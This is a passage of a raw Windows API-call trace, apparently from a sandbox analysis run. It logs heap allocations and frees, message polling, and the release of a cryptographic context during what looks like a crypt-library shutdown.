Size=0x8) returned 0x2e54f38 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0230.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0230.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0230.584] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0230.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0230.584] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0230.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0230.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0230.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0230.584] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0230.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0230.584] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0230.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0230.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0230.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0230.584] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0230.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0230.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0230.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0230.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0230.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0230.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0230.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0230.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0230.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0230.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0230.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0230.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0230.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0230.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0230.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0230.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0230.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0230.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0230.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0230.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0230.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0230.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0230.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0230.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0230.628] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0230.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0230.628] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0230.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0230.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0230.628] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0230.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0230.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0230.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0230.628] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0230.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0230.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0230.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0230.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0230.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0230.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0230.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0230.629] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0230.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0230.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0230.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0230.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0230.629] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0230.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0230.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0230.629] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0230.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0230.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0230.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0230.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0230.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0230.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0230.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.630] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0230.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0230.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0230.630] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0230.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0230.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0230.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0230.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0230.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0230.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0230.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0230.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0230.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0230.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0230.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0230.631] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0230.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0230.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0230.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0230.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0230.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0230.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0230.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0230.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0230.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0230.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0230.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0230.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0230.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0230.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0230.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0230.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0230.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0230.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0230.633] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0230.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0230.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0230.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0230.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.633] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0230.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0230.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0230.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0230.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0230.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0230.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0230.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0230.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0230.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0230.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0230.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0230.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0230.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0230.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0230.634] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.634] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: 